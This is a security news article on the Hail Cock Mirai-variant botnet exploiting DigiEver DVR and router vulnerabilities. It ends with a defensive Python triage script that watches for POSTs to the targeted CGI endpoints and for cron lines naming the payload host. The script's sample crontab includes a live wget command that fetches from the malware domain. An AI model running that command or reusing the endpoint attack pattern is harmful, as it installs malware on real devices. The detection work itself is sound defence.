DigiEver DVR Vulnerability Under Attack by Hail Cock Botnet


The Akamai Security Intelligence Research Team (SIRT) has found that a vulnerability in DigiEver DS-2105 Pro DVRs is being actively exploited by the Hail Cock botnet, a Mirai variant enhanced with modern encryption techniques.

The Hail Cock botnet thrives on unpatched devices, exploiting vulnerabilities such as:

  1. DigiEver DS-2105 Pro DVR: A remote code execution (RCE) flaw through the /cgi-bin/cgi_main.cgi endpoint allows attackers to inject malicious commands. This vulnerability was originally discovered by Ta-Lun Yen of TXOne Research.
  2. TP-Link Devices (CVE-2023-1389): Targets the /cgi-bin/luci endpoint to download and execute malicious scripts.
  3. Tenda HG6 Routers: Exploits remote command injection vulnerabilities in the firmware.
  4. Teltonika RUT9XX Routers (CVE-2018-17532): Uses a similar method to deploy malware.

The attack chain often begins with HTTP POST requests to download Mirai malware variants, escalating to broader network compromises. By targeting outdated firmware, the botnet gains control of devices that manufacturers no longer support.

Unlike earlier Mirai botnets, the Hail Cock malware employs modern cryptographic techniques such as ChaCha20 and XOR for decryption. This evolution indicates a shift in tactics to evade detection. “Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” Akamai noted.

The malware’s persistence mechanisms include cron jobs to download additional payloads from domains like hailcocks[.]ru. Its command-and-control (C2) communications leverage dynamic domains, ensuring consistent operation even as infrastructure changes.

Adding an odd twist, compromised devices display unique console messages upon infection. Older variants of the malware print “you are now apart of hail cock botnet,” while newer versions of the malware will print the phrase, “I just wanna look after my cats, man.”

The DigiEver DS-2105 Pro, now over a decade old, exemplifies the vulnerabilities of unsupported hardware. “One of the easiest methods for threat actors to compromise new hosts is to target outdated firmware or retired hardware,” Akamai warns. Upgrading to newer, supported models is strongly recommended to mitigate these risks.

Akamai has provided indicators of compromise (IoCs) to aid in defending against the Hail Cock botnet. Recommendations for mitigation include:

  • Firmware Updates: Regularly update device firmware to patch known vulnerabilities.
  • Network Segmentation: Isolate IoT devices from critical networks to limit exposure.
  • Strong Credentials: Replace default passwords with robust, unique ones.
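
The following triage script is an added example, not code from Akamai or the original article. It looks for the two behaviours described above: POST requests to the /cgi-bin/cgi_main.cgi and /cgi-bin/luci endpoints, and cron entries that reference hailcocks[.]ru. It assumes combined-format access logs; the function names and all sample data are constructed for illustration.

```python
import re
from collections import defaultdict

# Endpoints named in the article; request bodies are not inspected here.
WATCHED_PATHS = ("/cgi-bin/cgi_main.cgi", "/cgi-bin/luci")
# Payload host named in the article, matched in defanged and plain form.
PAYLOAD_HOST = re.compile(r"hailcocks(?:\[\.\]|\.)ru", re.IGNORECASE)
# Assumption: logs are in Apache/nginx "combined" access-log format.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_requests(log_lines):
    """Return {source_ip: [request_target, ...]} for POSTs to watched endpoints."""
    hits = defaultdict(list)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparseable line, or not the POST pattern described
        path = m["target"].split("?", 1)[0]
        if any(path == p or path.startswith(p + "/") for p in WATCHED_PATHS):
            hits[m["src"]].append(m["target"])
    return dict(hits)

def suspicious_cron_entries(crontab_text):
    """Return non-comment crontab lines that reference the payload host."""
    return [ln.strip() for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and PAYLOAD_HOST.search(ln)]

# Constructed sample data (documentation IP ranges, placeholder paths), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2025:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2025:10:00:09 +0000] "POST /cgi-bin/luci/PLACEHOLDER?x=1 HTTP/1.1" 404 0',
    '192.0.2.9 - - [01/Jan/2025:10:01:00 +0000] "GET /cgi-bin/cgi_main.cgi HTTP/1.1" 200 90',
]
REFANGED = "hailcocks[.]ru".replace("[.]", ".")  # kept defanged in source text
SAMPLE_CRON = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/local/bin/backup.sh\n"
    f"*/5 * * * * wget -q http://{REFANGED}/PLACEHOLDER\n"
)

if __name__ == "__main__":
    for src, targets in suspicious_requests(SAMPLE_LOG).items():
        print("http:", src, targets)
    for entry in suspicious_cron_entries(SAMPLE_CRON):
        print("cron:", entry)
```

A hit on the HTTP check only shows that the endpoint was reached with a POST, so it should be correlated with the source address and the device's expected management traffic before being treated as an exploitation attempt.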
